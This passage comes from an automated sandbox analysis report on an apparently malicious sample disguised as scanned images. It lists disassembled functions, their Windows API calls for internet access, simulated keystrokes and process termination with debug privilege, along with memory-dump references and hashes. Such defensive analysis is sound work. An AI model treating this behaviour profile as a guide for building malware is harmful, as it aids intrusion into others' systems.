                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                • String ID:
                                                                                • API String ID: 1268354404-0
                                                                                • Opcode ID: d6ea224d0831d8ecc7f011d2e072ff036e97beda03b1142ff807bd8faf5385ff
                                                                                • Instruction ID: 70a74f560001561024b2d6fb145731baf5392b5adfe57bfe0f4c5ba2e4c0c5e7
                                                                                • Opcode Fuzzy Hash: d6ea224d0831d8ecc7f011d2e072ff036e97beda03b1142ff807bd8faf5385ff
                                                                                • Instruction Fuzzy Hash: 30519EB0600209AFDB20CF25CC95FAB37B5FF65750F14461EF902962A0EB78A991DB49
                                                                                Function 004CC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004CC182
                                                                                • GetLastError.KERNEL32 ref: 004CC195
                                                                                • SetEvent.KERNEL32(?), ref: 004CC1A9
                                                                                  • Part of subcall function 004CC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 004CC272
                                                                                  • Part of subcall function 004CC253: GetLastError.KERNEL32 ref: 004CC322
                                                                                  • Part of subcall function 004CC253: SetEvent.KERNEL32(?), ref: 004CC336
                                                                                  • Part of subcall function 004CC253: InternetCloseHandle.WININET(00000000), ref: 004CC341
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                • String ID:
                                                                                • API String ID: 337547030-0
                                                                                • Opcode ID: 4f690bfb2fe212ac54ab55904ffdf41fc1f310656f36786a88a9c5422c6b7a45
                                                                                • Instruction ID: 13e962c0f296bd629c2a9430b9d5512118ea8fb5b38a9c5d93b1ca525e77be20
                                                                                • Opcode Fuzzy Hash: 4f690bfb2fe212ac54ab55904ffdf41fc1f310656f36786a88a9c5422c6b7a45
                                                                                • Instruction Fuzzy Hash: 3831BE79900641AFDB608FA5DCC4F77BBE9FF18300B04446EF95A86611CB34E8119FA9
                                                                                Function 004B25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 004B3A57
                                                                                  • Part of subcall function 004B3A3D: GetCurrentThreadId.KERNEL32 ref: 004B3A5E
                                                                                  • Part of subcall function 004B3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,004B25B3), ref: 004B3A65
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B25BD
                                                                                • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 004B25DB
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 004B25DF
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B25E9
                                                                                • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 004B2601
                                                                                • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 004B2605
                                                                                • MapVirtualKeyW.USER32(00000025,00000000), ref: 004B260F
                                                                                • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 004B2623
                                                                                • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 004B2627
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                • String ID:
                                                                                • API String ID: 2014098862-0
                                                                                • Opcode ID: 18537b439d5485f43ad071151dead102a774424c4bb22639b175e85db70f3278
                                                                                • Instruction ID: a6b3653b2059019c7d702400c011611ebfa4d413fd178b27b89c76585eee77eb
                                                                                • Opcode Fuzzy Hash: 18537b439d5485f43ad071151dead102a774424c4bb22639b175e85db70f3278
                                                                                • Instruction Fuzzy Hash: 4901D830390250BBFB1067699CCAF997F59DF4EB12F100016F314AE0D2C9E114458A7D
                                                                                Function 004B1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,004B1449,?,?,00000000), ref: 004B180C
                                                                                • HeapAlloc.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B1813
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B1449,?,?,00000000), ref: 004B1828
                                                                                • GetCurrentProcess.KERNEL32(?,00000000,?,004B1449,?,?,00000000), ref: 004B1830
                                                                                • DuplicateHandle.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B1833
                                                                                • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,004B1449,?,?,00000000), ref: 004B1843
                                                                                • GetCurrentProcess.KERNEL32(004B1449,00000000,?,004B1449,?,?,00000000), ref: 004B184B
                                                                                • DuplicateHandle.KERNEL32(00000000,?,004B1449,?,?,00000000), ref: 004B184E
                                                                                • CreateThread.KERNEL32(00000000,00000000,004B1874,00000000,00000000,00000000), ref: 004B1868
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                • String ID:
                                                                                • API String ID: 1957940570-0
                                                                                • Opcode ID: a8e68a4557aced61625c0130b92c8030cc62b012bb9bd92b65168922c77cbc03
                                                                                • Instruction ID: 4ae32e3f3fa548072103d8e53cb22d80d9bc8ab28d421240de61054b40d54715
                                                                                • Opcode Fuzzy Hash: a8e68a4557aced61625c0130b92c8030cc62b012bb9bd92b65168922c77cbc03
                                                                                • Instruction Fuzzy Hash: 8E01A8B5240348BFE710ABA5DCC9F6B7BACEB89B11F404421FA05DB1A2CA749C018F24
                                                                                Function 004DA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004BD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 004BD501
                                                                                  • Part of subcall function 004BD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 004BD50F
                                                                                  • Part of subcall function 004BD4DC: CloseHandle.KERNEL32(00000000), ref: 004BD5DC
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DA16D
                                                                                • GetLastError.KERNEL32 ref: 004DA180
                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004DA1B3
                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 004DA268
                                                                                • GetLastError.KERNEL32(00000000), ref: 004DA273
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DA2C4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                • String ID: SeDebugPrivilege
                                                                                • API String ID: 2533919879-2896544425
                                                                                • Opcode ID: 36cebcc0594704a954c874bdbefde51771eb26cbccc09a52553bdc3dcf25e86b
                                                                                • Instruction ID: f49da5db954e35e5ba721ac0747ba2f26e71a9f493a781365653d33ab67d0e40
                                                                                • Opcode Fuzzy Hash: 36cebcc0594704a954c874bdbefde51771eb26cbccc09a52553bdc3dcf25e86b
                                                                                • Instruction Fuzzy Hash: 976160312042419FD710DF15C4E4F1ABBE1AF44318F58849EE8664B7A3C77AED49CB9A
                                                                                Function 004E3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004E3925
                                                                                • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004E393A
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004E3954
                                                                                • _wcslen.LIBCMT ref: 004E3999
                                                                                • SendMessageW.USER32(?,00001057,00000000,?), ref: 004E39C6
                                                                                • SendMessageW.USER32(?,00001061,?,0000000F), ref: 004E39F4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window_wcslen
                                                                                • String ID: SysListView32
                                                                                • API String ID: 2147712094-78025650
                                                                                • Opcode ID: 9cb7d56d789a9d507d30770d54360a41f2a338ddd2dba5922e6020f966fc01e2
                                                                                • Instruction ID: 4a982b30bb865aa23a34132c5dcf5d9205a7eb23bebfa405c74c6af391bfc2bc
                                                                                • Opcode Fuzzy Hash: 9cb7d56d789a9d507d30770d54360a41f2a338ddd2dba5922e6020f966fc01e2
                                                                                • Instruction Fuzzy Hash: A741C971900258ABDF219F65CC49BEB7BA9FF08355F10012BF948E7281D7759D81CB98
                                                                                Function 004BBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004BBCFD
                                                                                • IsMenu.USER32(00000000), ref: 004BBD1D
                                                                                • CreatePopupMenu.USER32 ref: 004BBD53
                                                                                • GetMenuItemCount.USER32(01298428), ref: 004BBDA4
                                                                                • InsertMenuItemW.USER32(01298428,?,00000001,00000030), ref: 004BBDCC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                • String ID: 0$2
                                                                                • API String ID: 93392585-3793063076
                                                                                • Opcode ID: 3ed8b7768e1334a242008696dc527ba87db1c975135a23d52178168e8e2f7478
                                                                                • Instruction ID: 50a1efdd1c48a263da4d8b86e484f7f478c61345fbac3468ac434a80a47f0d90
                                                                                • Opcode Fuzzy Hash: 3ed8b7768e1334a242008696dc527ba87db1c975135a23d52178168e8e2f7478
                                                                                • Instruction Fuzzy Hash: AB51BD70A00205ABDF11CFA9C8C4BEEBBF9EF45314F14462AE4419B291D7BC9941CBB9
                                                                                Function 00472D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472D4B
                                                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 00472D53
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472DE1
                                                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 00472E0C
                                                                                • _ValidateLocalCookies.LIBCMT ref: 00472E61
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                • String ID: &HG$csm
                                                                                • API String ID: 1170836740-1363431019
                                                                                • Opcode ID: 4263725fb93a81830641d3f7cceeb7a3f7652b4d5693dffaf8f7a084f637a269
                                                                                • Instruction ID: 4a876ba0beeaefa3cb02043600414a95e27817b127548271d5f4179538d5c9cf
                                                                                • Opcode Fuzzy Hash: 4263725fb93a81830641d3f7cceeb7a3f7652b4d5693dffaf8f7a084f637a269
                                                                                • Instruction Fuzzy Hash: AF41A334E00209ABCF20DF69C945ADEBBB5BF44318F14C15BE81C6B352D779AA05CB95
                                                                                Function 004BC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • LoadIconW.USER32(00000000,00007F03), ref: 004BC913
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoad
                                                                                • String ID: blank$info$question$stop$warning
                                                                                • API String ID: 2457776203-404129466
                                                                                • Opcode ID: b240baa155999a1ff0320fa2809e6b33db6a42c06fb58c357756048e203f7d2e
                                                                                • Instruction ID: 0c0ef8a93f1178d01e060f3c7e7ae30aae5006d69cfe0291ff3f3fb75cfa3b64
                                                                                • Opcode Fuzzy Hash: b240baa155999a1ff0320fa2809e6b33db6a42c06fb58c357756048e203f7d2e
                                                                                • Instruction Fuzzy Hash: 30112772789307BAB700AB149CC2CEB279CDF55329B20402FF504E62C2E7A86E4152BD
                                                                                Function 004BED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _wcslen$LocalTime
                                                                                • String ID:
                                                                                • API String ID: 952045576-0
                                                                                • Opcode ID: 076b55dd7a4035d4ef0288807785f5fac9e3b0b96398ced463b0be807d6d9e89
                                                                                • Instruction ID: 4086cf1a8ac6d2bb9bb066179c64d2d6dd2876665ae93c2aad7077efaaeef737
                                                                                • Opcode Fuzzy Hash: 076b55dd7a4035d4ef0288807785f5fac9e3b0b96398ced463b0be807d6d9e89
                                                                                • Instruction Fuzzy Hash: A641C765C1011876CB51EBF6888A9CF77BCAF85300F00856BE518E3122FB38D245C3AE
                                                                                Function 0046F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 0046F953
                                                                                • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004AF3D1
                                                                                • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,004A682C,00000004,00000000,00000000), ref: 004AF454
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1268545403-0
                                                                                • Opcode ID: 6c63043aacec38ce93110a302710cd1be19c34826a1d2c562636324f2dd05f8a
                                                                                • Instruction ID: cdf3bbcb0e9338db31a5ca3bd852ecc615d05ad050361ffee66a97502ad64a11
                                                                                • Opcode Fuzzy Hash: 6c63043aacec38ce93110a302710cd1be19c34826a1d2c562636324f2dd05f8a
                                                                                • Instruction Fuzzy Hash: DE413EB0204780BAD7388B69A8C872B7B916B67314F14443FE4C756761E63D948DCB1F
                                                                                Function 004E2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteObject.GDI32(00000000), ref: 004E2D1B
                                                                                • GetDC.USER32(00000000), ref: 004E2D23
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E2D2E
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004E2D3A
                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 004E2D76
                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004E2D87
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,004E5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 004E2DC2
                                                                                • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004E2DE1
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 3864802216-0
                                                                                • Opcode ID: 1c593c92071a0822d86cca17a074af24bc2e2f7b7cfbe09e30cf17502510d1fc
                                                                                • Instruction ID: 080919da366d5a89f197de2c27c15e3e655893ff9b0f6054e4689172f824e74a
                                                                                • Opcode Fuzzy Hash: 1c593c92071a0822d86cca17a074af24bc2e2f7b7cfbe09e30cf17502510d1fc
                                                                                • Instruction Fuzzy Hash: 8A318F72201254BBEB118F558C8AFFB3BADEB49715F044065FE089E292C6B59C41C7A8
                                                                                Function 004B5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: _memcmp
                                                                                • String ID:
                                                                                • API String ID: 2931989736-0
                                                                                • Opcode ID: 22cff26533f8c54bc1f743746588193ce73adaa944f0fd2301521ef4cfff2e10
                                                                                • Instruction ID: 08b6eaefc1e56c50ff9650a292e07304fa542d04b7608de6fe0e0590c4a01d8f
                                                                                • Opcode Fuzzy Hash: 22cff26533f8c54bc1f743746588193ce73adaa944f0fd2301521ef4cfff2e10
                                                                                • Instruction Fuzzy Hash: 6D2198717409097BB21455265D82FFBB35CAF20389F644027FD0C9AA81FB6CEE1581BD
                                                                                Function 004D4FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: NULL Pointer assignment$Not an Object type
                                                                                • API String ID: 0-572801152
                                                                                • Opcode ID: 92bf1e1c7826d03ff99951c2744d46053ce62a2915ab737aa417bf20eb1c6709
                                                                                • Instruction ID: 2106651474e5c03f926d84854ee149d93c4e4785016704e9cd546e2884bf5c7d
                                                                                • Opcode Fuzzy Hash: 92bf1e1c7826d03ff99951c2744d46053ce62a2915ab737aa417bf20eb1c6709
                                                                                • Instruction Fuzzy Hash: 53D19171A0060A9FDF10CFA8C891BAEB7B5BF48344F14846BE915AB381EB74DD45CB94
                                                                                Function 00491522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,?), ref: 004915CE
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00491651
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004916E4
                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 004916FB
                                                                                  • Part of subcall function 00483820: RtlAllocateHeap.NTDLL(00000000,?,00521444,?,0046FDF5,?,?,0045A976,00000010,00521440,004513FC,?,004513C6,?,00451129), ref: 00483852
                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00491777
                                                                                • __freea.LIBCMT ref: 004917A2
                                                                                • __freea.LIBCMT ref: 004917AE
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
